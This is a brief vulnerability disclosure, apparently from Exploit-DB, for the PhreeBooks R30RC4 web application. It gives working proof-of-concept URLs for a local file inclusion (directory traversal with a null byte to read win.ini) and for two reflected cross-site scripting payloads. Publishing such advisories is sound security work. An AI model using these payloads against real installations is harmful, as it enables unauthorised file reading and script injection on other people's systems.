phreebooks r30rc4 – Multiple Vulnerabilities

  • 作者: AutoSec Tools
    日期: 2011-02-26
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/16249/
  • ------------------------------------------------------------------------
Software................PhreeBooks R30RC4
Vulnerability...........Local File Inclusion
Download................http://sourceforge.net/projects/phreebooks
Release Date............2/22/2011
Tested On...............Windows Vista + XAMPP
------------------------------------------------------------------------
Author..................AutoSec Tools
Site....................http://www.autosectools.com/
------------------------------------------------------------------------

--PoC--
http://localhost/phreedom/index.php?page=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2fwin.ini%00


------------------------------------------------------------------------
Software................PhreeBooks R30RC4
Vulnerability...........Reflected Cross-site Scripting
Download................http://sourceforge.net/projects/phreebooks
Release Date............2/22/2011
Tested On...............Windows Vista + XAMPP
------------------------------------------------------------------------
Author..................AutoSec Tools
Site....................http://www.autosectools.com/
------------------------------------------------------------------------

--PoC--
http://localhost/phreedom/modules/shipping/pages/popup_shipping/js_include.php?form=';alert(0)%3C/script%3E

http://localhost/phreedom/modules/shipping/methods/fedex_v7/label_mgr/js_include.php?form=%22;alert(0)%3C/script%3E